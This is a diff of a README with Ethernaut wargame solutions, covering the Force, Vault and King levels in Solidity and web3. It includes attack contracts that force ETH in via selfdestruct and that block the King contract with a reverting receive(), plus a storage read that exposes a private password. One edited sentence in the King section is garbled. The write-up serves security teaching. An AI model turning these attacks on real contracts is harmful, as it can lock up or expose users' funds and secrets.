n00b21337/Ethernaut-Solutions-V2/README.md

     inputs: []
 });

-await contract.sendTransaction({
+await web3.eth.sendTransaction({
+    from: player,
+    to: instance,
     data: payload
 });
 ```

 ## 7. Force
-You can easily forcibly send ether to a contract.
-Read [this](https://consensys.github.io/smart-contract-best-practices/known_attacks/#forcibly-sending-ether-to-a-contract) to learn more.
+Even if a contract doesn't implement a receive / fallback or any payable functions to handle incoming ETH, it is still possible to forcefully send ETH to a contract through the use of `selfdestruct`.
+If you're deploying this contract through remix, don't forget to specify value before deploying the AttackForce contract or the `selfdestruct` won't be able to send any ETH over as there are no ETH in the contract to be sent over!
 ```
-pragma solidity ^0.6.0;
+pragma solidity ^0.8.0;

 contract AttackForce {

-    constructor(address payable _victim) public payable {
+    constructor(address payable _victim) payable {
         selfdestruct(_victim);
     }
 }
 ```

 ## 8. Vault
 Your private variables are private if you try to access it the normal way e.g. via another contract but the problem is that everything on the blockchain is visible so even if the variable's visibility is set to private, you can still access it based on its index in the smart contract.
-Learn more about this [here](https://solidity.readthedocs.io/en/latest/miscellaneous.html#layout-of-state-variables-in-storage).x
+Learn more about this [here](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html).
 ```
 const password = await web3.eth.getStorageAt(instance, 1);
 await contract.unlock(password);
 ```

 ## 9. King
-This is a classic example of DDoS with unexpected revert when part of the logic in the victim's contract involves transferring ether to the previous "lead", which in this case is the king.
+This is a classic example of DDoS with unexpected revert when the logic of the victim's contract involve sending funds to  in the victim's contract involves transferring ether to the previous "lead", which in this case is the king.
 A malicious user would create a smart contract with either:

 - a `fallback` / `receive` function that does `revert()`
 - or the absence of a `fallback` / `receive` function

-Once the malicious user uses this smart contract to take over the "king" position, all funds in the victim's contract is effectively stuck in there because nobody can take over as the new "king" no matter howm uch ether they use because the fallback function in the victim's contract will always fail when it tries to do `king.transfer(msg.value);`
+Once the malicious user uses this smart contract to take over the "king" position, all funds in the victim's contract is effectively stuck in there because nobody can take over as the new "king" no matter how much ether they use because the fallback function in the victim's contract will always fail when it tries to do `king.transfer(msg.value);`
 ```
-pragma solidity ^0.6.0;
+pragma solidity ^0.8.0;

 contract AttackKing {

-    constructor(address payable _victim) public payable {
+    constructor(address _victim) payable {
-        _victim.call.gas(1000000).value(1 ether)("");
+        _victim.call{value: 10000000000000000 wei}("");
     }

     receive() external payable {
         revert();
     }